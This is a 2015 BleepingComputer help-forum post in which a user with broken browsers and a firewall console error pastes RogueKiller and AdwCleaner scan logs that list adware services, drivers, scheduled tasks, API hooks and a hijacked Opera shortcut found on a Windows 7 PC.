Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

MMC error & can't start browsing


  • This topic is locked This topic is locked
3 replies to this topic

#1 VickyPratama

VickyPratama

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:02:09 PM

Posted 26 July 2015 - 07:25 AM

i'm sorry if my english is not well...

I have problem with my browser.. I cant install all my browser.. Mozilla, chrome, or Opera... And My Internet Exploler is gone to from my taskbar. But I have internet  connection with wifi. I get this problem after I install Free AVG anti-virus. i didnt know about it. I try to change my administrator, unistall AvG, and other little thing. When i see the solution in my friend pc, maybe i thing it is becouse My MMC. If i go into my firewall advanced settings and try to click on inbound or outbound rules i get an error that says "MMC has detected an error in a snap-in and will unload it. if I press unload the snap-in and continue running it get "FX:{b05566ac-fe9c-4368-be02-7a4cbb7cbe11}" The requested service provider could not be loaded or initialized. Exception type:System.Net.Sockets.SocketException. These are the only problems that I have cought so far.. Please help.. Last solution i tried is with rogue killer n adw cleaner.. this is the result :

 

ROGUEKILLER

RogueKiller V10.9.3.0 [Jul 21 2015] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7600 ) 32 bits version
Started in : Normal mode
User : Cucuk [Administrator]
Started from : C:\Users\Cucuk\Desktop\RogueKiller (1).exe
Mode : Delete -- Date : 07/26/2015 15:18:17

¤¤¤ Processes : 10 ¤¤¤
[PUP] ProtectWindowsManager.exe(1816) -- C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe[7] -> Killed [TermProc]
[Suspicious.Path] TSVulFW.DAT(1988) -- C:\ProgramData\Tencent\TSVulFw\TSVulFW.DAT[7] -> Unloaded
[PUP] (SVC) cherimoya -- system32\drivers\cherimoya.sys[7] -> ERROR [41c]
[PUP] (SVC) nethfdrv -- \??\C:\Windows\system32\drivers\nethfdrv.sys[7] -> Stopped
[PUP] (SVC) QMUdisk -- \??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMUdisk.sys[7] -> ERROR [41c]
[PUP] (SVC) QQPCRTP -- "C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCRTP.exe" -r[7] -> ERROR [41c]
[PUP] (SVC) TAOAccelerator -- \??\C:\Windows\system32\Drivers\TAOAccelerator.sys[7] -> Stopped
[PUP] (SVC) TS888 -- \??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TS888.sys[7] -> Stopped
[PUP] (SVC) TSDefenseBt -- system32\DRIVERS\TSDefenseBt.sys[7] -> Stopped
[PUP] (SVC) TSSysKit -- \??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSSysKit.sys[7] -> ERROR [41c]

¤¤¤ Registry : 56 ¤¤¤
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cherimoya (system32\drivers\cherimoya.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\globalUpdate (C:\Program Files\globalUpdate\Update\globalupdate.exe /svc) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\globalUpdatem (C:\Program Files\globalUpdate\Update\globalupdate.exe /medsvc) -> Not selected
[Suspicious.Path] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gopibeko (C:\Users\Cukwenk\AppData\Local\CD674440-1437823846-11E1-8EA2-047D7BFA1DE9\snsjB19.tmp) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\IHProtect Service (C:\Program Files\MiuiTab\ProtectService.exe) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\nethfdrv (\??\C:\Windows\system32\drivers\nethfdrv.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetHttpService (C:\Windows\system32\nethtsrv.exe) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\QMUdisk (\??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMUdisk.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\QQPCRTP ("C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCRTP.exe" -r) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ServiceUpdater (C:\Windows\system32\netupdsrv.exe) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TAOAccelerator (\??\C:\Windows\system32\Drivers\TAOAccelerator.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TS888 (\??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TS888.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TSDefenseBt (system32\DRIVERS\TSDefenseBt.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TSSysKit (\??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSSysKit.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vicoqudu (C:\Users\Cukwenk\AppData\Roaming\CD674440-1436220497-11E1-8EA2-047D7BFA1DE9\hnsg463B.tmp) -> Not selected
[PUP|Suspicious.Path] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WindowsMangerProtect (C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe -service) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\zejytose (C:\Users\Cukwenk\AppData\Roaming\CD674440-1436881159-11E1-8EA2-047D7BFA1DE9\jnsrDD0E.tmp) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\cherimoya (system32\drivers\cherimoya.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\globalUpdate (C:\Program Files\globalUpdate\Update\globalupdate.exe /svc) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\globalUpdatem (C:\Program Files\globalUpdate\Update\globalupdate.exe /medsvc) -> Not selected
[Suspicious.Path] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\gopibeko (C:\Users\Cukwenk\AppData\Local\CD674440-1437823846-11E1-8EA2-047D7BFA1DE9\snsjB19.tmp) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\IHProtect Service (C:\Program Files\MiuiTab\ProtectService.exe) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\nethfdrv (\??\C:\Windows\system32\drivers\nethfdrv.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\NetHttpService (C:\Windows\system32\nethtsrv.exe) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\QMUdisk (\??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMUdisk.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\QQPCRTP ("C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCRTP.exe" -r) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\ServiceUpdater (C:\Windows\system32\netupdsrv.exe) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\TAOAccelerator (\??\C:\Windows\system32\Drivers\TAOAccelerator.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\TS888 (\??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TS888.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\TSDefenseBt (system32\DRIVERS\TSDefenseBt.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\TSSysKit (\??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSSysKit.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\vicoqudu (C:\Users\Cukwenk\AppData\Roaming\CD674440-1436220497-11E1-8EA2-047D7BFA1DE9\hnsg463B.tmp) -> Not selected
[PUP|Suspicious.Path] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\WindowsMangerProtect (C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe -service) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet001\Services\zejytose (C:\Users\Cukwenk\AppData\Roaming\CD674440-1436881159-11E1-8EA2-047D7BFA1DE9\jnsrDD0E.tmp) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\cherimoya (system32\drivers\cherimoya.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\globalUpdate (C:\Program Files\globalUpdate\Update\globalupdate.exe /svc) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\globalUpdatem (C:\Program Files\globalUpdate\Update\globalupdate.exe /medsvc) -> Not selected
[Suspicious.Path] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\gopibeko (C:\Users\Cukwenk\AppData\Local\CD674440-1437823846-11E1-8EA2-047D7BFA1DE9\snsjB19.tmp) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\IHProtect Service (C:\Program Files\MiuiTab\ProtectService.exe) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\nethfdrv (\??\C:\Windows\system32\drivers\nethfdrv.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\NetHttpService (C:\Windows\system32\nethtsrv.exe) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\QMUdisk (\??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMUdisk.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\QQPCRTP ("C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QQPCRTP.exe" -r) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\ServiceUpdater (C:\Windows\system32\netupdsrv.exe) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\TAOAccelerator (\??\C:\Windows\system32\Drivers\TAOAccelerator.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\TS888 (\??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TS888.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\TSDefenseBt (system32\DRIVERS\TSDefenseBt.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\TSSysKit (\??\C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSSysKit.sys) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\vicoqudu (C:\Users\Cukwenk\AppData\Roaming\CD674440-1436220497-11E1-8EA2-047D7BFA1DE9\hnsg463B.tmp) -> Not selected
[PUP|Suspicious.Path] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\WindowsMangerProtect (C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe -service) -> Not selected
[PUP] HKEY_LOCAL_MACHINE\System\ControlSet002\Services\zejytose (C:\Users\Cukwenk\AppData\Roaming\CD674440-1436881159-11E1-8EA2-047D7BFA1DE9\jnsrDD0E.tmp) -> Not selected
[PUM.HomePage] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Start Page :
[PUM.HomePage] HKEY_USERS\S-1-5-21-3110752661-1710530649-2414096437-1001\Software\Microsoft\Internet Explorer\Main | Start Page :
[PUM.HomePage] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Default_Page_URL :
[PUM.SearchPage] HKEY_USERS\S-1-5-21-3110752661-1710530649-2414096437-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve  -> Not selected
[Suspicious.Path] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_DLLs : c:\progra~2\{9a227~1\201~1.9\cina.dll [-] -> Not selected

¤¤¤ Tasks : 3 ¤¤¤
[Suspicious.Path] %WINDIR%\Tasks\AmiUpdXp.job -- C:\Users\Cukwenk\AppData\Local\14536\Updater.exe -> Not selected
[Suspicious.Path] %WINDIR%\Tasks\Run_Dregol.job -- C:\Users\Cukwenk\AppData\Local\{8550B~1\UNINST~1.EXE (/Check) -> Not selected
[Suspicious.Path] %WINDIR%\Tasks\TuneInPro.job -- c:\programdata\{c9a57a36-327b-fad7-c9a5-57a36327e8d8}\setup.exe (--startup=1 --single) -> Not selected

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 16 (Driver: Loaded) ¤¤¤
[IAT:Inl(Hook.IEAT)] (explorer.exe) ADVAPI32.dll - RegQueryValueExW : Unknown @ 0x6790860 (jmp 0x8f234b8b|jmp 0xffb32d8c|call 0xffff4d9a)
[IAT:Inl(Hook.IEAT)] (explorer.exe) ADVAPI32.dll - RegSetValueExW : Unknown @ 0x67907f0 (jmp 0x8f23eb6e|jmp 0xffb32dfc|call 0xffff4d9a)
[IAT:Inl(Hook.IEAT)] (explorer.exe) kernel32.dll - CreateProcessW : Unknown @ 0x6790b00 (jmp 0x9092ead3|jmp 0xffb32aec|call 0xffff4d9a)
[IAT:Inl(Hook.IEAT)] (explorer.exe) kernel32.dll - ExitProcess : C:\ProgramData\Tencent\TSVulFw\TSVulFW.DAT @ 0x698a83b0 (jmp 0xf39f58e1)
[IAT:Inl(Hook.IEAT)] (explorer.exe) USER32.dll - ShowWindow : C:\ProgramData\Tencent\TSVulFw\TSVulFW.DAT @ 0x698a8dfe (jmp 0xf2487984)
[IAT:Inl(Hook.IEAT)] (explorer.exe) SHLWAPI.dll - SHRegGetValueW : C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMBrowserSafe.dll @ 0x69813d42 (jmp 0xf24854ae)
[IAT:Inl(Hook.IEAT)] (explorer.exe) SHELL32.dll - SHGetSpecialFolderPathW : C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMIEsafeDll.dll @ 0x69846efd (jmp 0xf38e70c0)
[IAT:Inl(Hook.IEAT)] (explorer.exe) SHELL32.dll - ShellExecuteExW : C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMIEsafeDll.dll @ 0x69846fa8 (jmp 0xf38e541c)
[IAT:Inl(Hook.IEAT)] (explorer.exe) SHELL32.dll - SHBindToObject : Unknown @ 0x67909b0 (jmp 0x907b0777|jmp 0xffb32c3c|call 0xffff4d9a)
[IAT:Inl(Hook.IEAT)] (explorer.exe @ kernel32.dll) ntdll.dll - NtQueryValueKey : C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMIEsafeDll.dll @ 0x6984b225 (jmp 0xf1fd5b95)
[IAT:Inl(Hook.IEAT)] (explorer.exe @ kernel32.dll) ntdll.dll - RtlCreateProcessParametersEx : C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMIEsafeDll.dll @ 0x69847333 (jmp 0xf1fad820)
[IAT:Inl(Hook.IEAT)] (explorer.exe @ kernel32.dll) ntdll.dll - NtCreateUserProcess : C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\QMBrowserSafe.dll @ 0x6981405e (jmp 0xf1f9f49e)
[IAT:Inl(Hook.IEAT)] (explorer.exe @ WININET.dll) ADVAPI32.dll - RegSetValueExA : Unknown @ 0x6790780 (jmp 0x8f23ebea|jmp 0xffb32e6c|call 0xffff4d9a)
[IAT:Inl(Hook.IEAT)] (chrome.exe) kernel32.dll - ExitProcess : C:\ProgramData\Tencent\TSVulFw\TSVulFW.DAT @ 0x698a83b0 (jmp 0xf39f58e1)
[IAT:Inl(Hook.IEAT)] (chrome.exe @ webio.dll) kernel32.dll - CreateThreadpoolIo : C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSWebMon.dat @ 0x642c0fce (jmp 0xee429395)
[IAT:Inl(Hook.IEAT)] (chrome.exe @ explorerframe.dll) SHELL32.dll - ShellExecuteExW : C:\Program Files\Tencent\QQPCMgr\10.10.16434.218\TSWebMon.dat @ 0x642e71af (jmp 0xee385623)

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: TOSHIBA MQ01ABD050 +++++
--- User ---
[MBR] 84b25dd5f7a5e29d5b46db54f9949e27
[BSP] b72e9200b9136a918fb7dbb4ef5dc48b : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 106838 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 219011072 | Size: 185000 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
3 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 597891072 | Size: 185000 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 

ADWCLEANER

# AdwCleaner v4.208 - Logfile created 26/07/2015 at 15:19:46
# Updated 09/07/2015 by Xplode
# Database : 2015-07-09.2 [Local]
# Operating system : Windows 7 Ultimate  (x86)
# Username : Cucuk - CUKWENK-PC
# Running from : C:\Users\Cucuk\Desktop\adwcleaner_4.208.exe
# Option : Scan

***** [ Services ] *****

Service Found : cherimoya
Service Found : globalUpdate
Service Found : globalUpdatem
Service Found : IHProtect Service
Service Found : nethfdrv
Service Found : NethxxpService
Service Found : QQPCRTP
Service Found : ServiceUpdater
Service Found : WindowsMangerProtect
Service Found : TS888
Service Found : TAOAccelerator
Service Found : TSDefenseBt
Service Found : TSSysKit
Service Found : QMUdisk
Service Found : TSCPM
Service Found : TFsFlt
Service Found : TAOFrame
Service Found : tsksp
Service Found : QQSysMon
Service Found : TsFltMgr
Service Found : TAOKernelDriver
Service Found : TSSK
Service Found : QMIEProtect
Service Found : 426ab601

***** [ Files / Folders ] *****

File Found : C:\Program Files\Common Files\config\uninstinethnfd.exe
File Found : C:\Users\Cukwenk\Desktop\AnyProtect.lnk
File Found : C:\Users\Cukwenk\Desktop\Live PC Help.lnk
File Found : C:\Windows\system32\drivers\cherimoya.sys
File Found : C:\Windows\system32\drivers\nethfdrv.sys
File Found : C:\Windows\system32\drivers\TAOAccelerator.sys
File Found : C:\Windows\system32\drivers\TAOKernel.sys
File Found : C:\Windows\system32\drivers\TFsFlt.sys
File Found : C:\Windows\system32\drivers\TS888.sys
File Found : C:\Windows\system32\drivers\TSDefenseBt.sys
File Found : C:\Windows\system32\drivers\TsFltMgr.sys
File Found : C:\Windows\system32\installd.exe
File Found : C:\Windows\system32\Oexufafono.ini
File Found : C:\Windows\system32\OexufafonoOff.ini
File Found : C:\Windows\system32\roboot.exe
File Found : C:\Windows\system32\sasnative32.exe
File Found : C:\Windows\system32\tssk.sys
Folder Found : C:\IQIYI Video
Folder Found : C:\Program Files\AnyProtectEx
Folder Found : C:\Program Files\ASP
Folder Found : C:\Program Files\CinemaPlus-3.2cV05.07
Folder Found : C:\Program Files\Common Files\tencent
Folder Found : C:\Program Files\CuuttThEPriucce
Folder Found : C:\Program Files\DriverToolkit
Folder Found : C:\Program Files\globalUpdate
Folder Found : C:\Program Files\gmsd_ra_005010022
Folder Found : C:\Program Files\gmsd_ra_005010038
Folder Found : C:\Program Files\gmsd_ra_005010040
Folder Found : C:\Program Files\GoHD
Folder Found : C:\Program Files\Jungle Net
Folder Found : C:\Program Files\miuitab
Folder Found : C:\Program Files\predm
Folder Found : C:\Program Files\RanndomPRiiice
Folder Found : C:\Program Files\SavePass 1.1
Folder Found : C:\Program Files\SavePass 1.1
Folder Found : C:\Program Files\shopperz
Folder Found : C:\Program Files\tencent
Folder Found : C:\ProgramData\{c9a57a36-327b-fad7-c9a5-57a36327e8d8}
Folder Found : C:\ProgramData\9201185608438035577
Folder Found : C:\ProgramData\IHProtectUpDate
Folder Found : C:\ProgramData\IQIYI Video
Folder Found : C:\ProgramData\lojdkkabciignnppakcahhgihclijfid
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced System~Protector
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverToolkit
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GAMESDESKTOP
Folder Found : C:\ProgramData\Systweak
Folder Found : C:\ProgramData\tencent
Folder Found : C:\ProgramData\TXQMPC
Folder Found : C:\ProgramData\WindowsMangerProtect
Folder Found : C:\Users\Cucuk\AppData\Roaming\tencent
Folder Found : C:\Users\Cukwenk\AppData\Local\CD674440-1436838005-11E1-8EA2-047D7BFA1DE9
Folder Found : C:\Users\Cukwenk\AppData\Local\Crossbrowse
Folder Found : C:\Users\Cukwenk\AppData\Local\DriverToolkit
Folder Found : C:\Users\Cukwenk\AppData\Local\globalUpdate
Folder Found : C:\Users\Cukwenk\AppData\Local\gmsd_ra_005010022
Folder Found : C:\Users\Cukwenk\AppData\Local\gmsd_ra_005010038
Folder Found : C:\Users\Cukwenk\AppData\Local\gmsd_ra_005010040
Folder Found : C:\Users\Cukwenk\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
Folder Found : C:\Users\Cukwenk\AppData\Roaming\AnyProtectEx
Folder Found : C:\Users\Cukwenk\AppData\Roaming\ASPackage
Folder Found : C:\Users\Cukwenk\AppData\Roaming\cpuminer
Folder Found : C:\Users\Cukwenk\AppData\Roaming\IQIYI Video
Folder Found : C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AnyProtect PC Backup
Folder Found : C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
Folder Found : C:\Users\Cukwenk\AppData\Roaming\mystartsearch
Folder Found : C:\Users\Cukwenk\AppData\Roaming\OpenCandy
Folder Found : C:\Users\Cukwenk\AppData\Roaming\Systweak
Folder Found : C:\Users\Cukwenk\AppData\Roaming\tencent
Folder Found : C:\Windows\system32\config\systemprofile\AppData\Roaming\tencent

***** [ Scheduled tasks ] *****

Task Found : AmiUpdXp
Task Found : APSnotifierPP1
Task Found : APSnotifierPP2
Task Found : APSnotifierPP3
Task Found : ASP
Task Found : Crossbrowse
Task Found : globalUpdateUpdateTaskMachineCore
Task Found : globalUpdateUpdateTaskMachineUA
Task Found : Run_Dregol
Task Found : amiupdaterExd
Task Found : amiupdaterExi
Task Found : Advanced System~Protector
Task Found : Advanced System~Protector_startup
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-6
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-7
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-10_user
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-11
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-3
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-4
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5_user
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-6
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-7
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-6
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-1-7
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-10_user
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-11
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-3
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-4
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5_user
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-6
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-7
Task Found : 7ac5c440-fd07-4e61-a049-8edfc7759672-1-6
Task Found : 7ac5c440-fd07-4e61-a049-8edfc7759672-1-7
Task Found : 7ac5c440-fd07-4e61-a049-8edfc7759672-10_user
Task Found : 7ac5c440-fd07-4e61-a049-8edfc7759672-3
Task Found : 7ac5c440-fd07-4e61-a049-8edfc7759672-5
Task Found : 7ac5c440-fd07-4e61-a049-8edfc7759672-5_user
Task Found : 7ac5c440-fd07-4e61-a049-8edfc7759672-6
Task Found : 7ac5c440-fd07-4e61-a049-8edfc7759672-7
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-1-6
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-1-7
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-10_user
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-11
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-3
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-4
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-5
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-5_user
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-6
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-7
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-1-6
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-1-7
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-10_user
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-11
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-3
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-4
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-5
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-5_user
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-6
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-7
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-1-6
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-10_user
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-5_user
Task Found : 35aa6d8e-8d62-46d5-85c6-1ba7c9408914-6
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-10_user
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-5_user
Task Found : 6208c90e-63ef-4e5b-be70-99a17fc0eb4e-6
Task Found : 7ac5c440-fd07-4e61-a049-8edfc7759672-1-6
Task Found : 7ac5c440-fd07-4e61-a049-8edfc7759672-5_user
Task Found : 7ac5c440-fd07-4e61-a049-8edfc7759672-6
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-1-6
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-10_user
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-11
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-3
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-5_user
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-6
Task Found : 98d446af-8794-4b83-b37f-028ad13d59d8-7
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-10_user
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-5_user
Task Found : aec13a97-93b2-4738-96e9-978ab384cb13-6

***** [ Shortcuts ] *****

Shortcut Infected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk

***** [ Registry ] *****

Data Found : HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\OperaStable\shell\open\command [(Default)] - "C:\Program Files\Opera\Launcher.exe" hxxp://www.mystartsearch.com/?type=sc&ts=1437867583&z=1c2fdf7b00bd15fcb05f74fgfz6c6mfm3tdt8g2c6g&from=cmi&uid=TOSHIBAXMQ01ABD050_62IJS463SXX62IJS463S
Key Found : HKCU\Software\GlobalUpdate
Key Found : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\70641dd1-34cd-42fe-86c8-129d4edac4cb
Key Found : HKLM\SOFTWARE\8e87aad5-1fa2-0d9c-3f37-31ad49714bd6
Key Found : HKLM\SOFTWARE\adc8c45a-11a1-47b5-b111-8fd0d2067cdd
Key Found : HKLM\SOFTWARE\AIM Toolbar
Key Found : HKLM\SOFTWARE\ArenaHD
Key Found : HKLM\SOFTWARE\AskPartnerNetwork
Key Found : HKLM\SOFTWARE\bb7bdab3-e852-49e1-977d-5d02fd834195
Key Found : HKLM\SOFTWARE\cf64f721-9d00-4ab4-b6e6-c19023f586b3
Key Found : HKLM\SOFTWARE\CinemaPlus-3.2cV05.07
Key Found : HKLM\SOFTWARE\CinemaPlus-3.2cV05.07-nv
Key Found : HKLM\SOFTWARE\CinemaPlus-3.2cV05.07-nv-ie
